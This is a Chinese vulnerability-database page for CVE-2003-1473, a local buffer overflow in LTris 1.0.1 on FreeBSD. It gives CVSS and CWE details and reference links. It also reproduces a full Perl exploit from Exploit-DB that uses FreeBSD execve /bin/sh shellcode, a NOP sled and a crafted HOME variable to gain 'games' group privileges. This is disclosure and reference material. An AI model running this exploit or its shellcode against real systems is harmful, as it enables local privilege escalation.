CVE-2003-1473
CVSS4.6
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:37:01
NMCOE    

[原文]Buffer overflow in LTris 1.0.1 of FreeBSD Ports Collection 2003-02-25 and earlier allows local users to execute arbitrary code with gid "games" permission via a long HOME environment variable.


[CNNVD]Lgames LTris本地内存破坏漏洞(CNNVD-200312-451)

        FreeBSD Ports Collection 2003-02-25及其早期版本的LTris 1.0.1版本存在缓冲区溢出漏洞。本地用户可以借助超长HOME环境变量执行任意带有gid"games"许可的任意代码。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1473
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1473
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-451
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/11978
(UNKNOWN)  XF  ltris-bo(11978)
http://www.securityfocus.com/bid/7537
(UNKNOWN)  BID  7537
http://www.securityfocus.com/archive/1/321001
(UNKNOWN)  BUGTRAQ  20030508 ltris-and-slashem-tty possible trouble
http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2003-05/0122.html
(UNKNOWN)  FULLDISC  20030509 ltris-and-slashem-tty possible trouble

- 漏洞信息

Lgames LTris本地内存破坏漏洞
中危 缓冲区溢出
2003-12-31 00:00:00 2003-12-31 00:00:00
本地  
        FreeBSD Ports Collection 2003-02-25及其早期版本的LTris 1.0.1版本存在缓冲区溢出漏洞。本地用户可以借助超长HOME环境变量执行任意带有gid"games"许可的任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (22574)

Lgames LTris 1.0.1 Local Memory Corruption Vulnerability (EDBID:22574)
freebsd local
2003-05-09 Verified
0 Knud Erik Hojgaard
N/A [点击下载]
source: http://www.securityfocus.com/bid/7537/info

A memory corruption vulnerability has been reported for LTris that may result in a local attacker obtaining group 'games' privileges. 

#!/usr/bin/perl
$len = 520;
$ret = 0xbfbff825;
$nop = "\x90";
$offset = 0;
$shellcode =    "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56". #freebsd 29 bytes
                "\xb0\x3b\x50\xcd\x80\xe8\xed\xff\xff\xff\x2f". #execve /bin/sh
                "\x62\x69\x6e\x2f\x73\x68\x23";                 #zillionATsafemode.org

if (@ARGV == 1) {
    $offset = $ARGV[0];
}
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");
$new_ret = pack('l', ($ret + $offset));

for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}
local($ENV{'HOME'}) = $buffer; 
exec("ltris 2>/dev/null");		

- 漏洞信息

60365
LTris on FreeBSD HOME Environment Variable Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-05-08 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站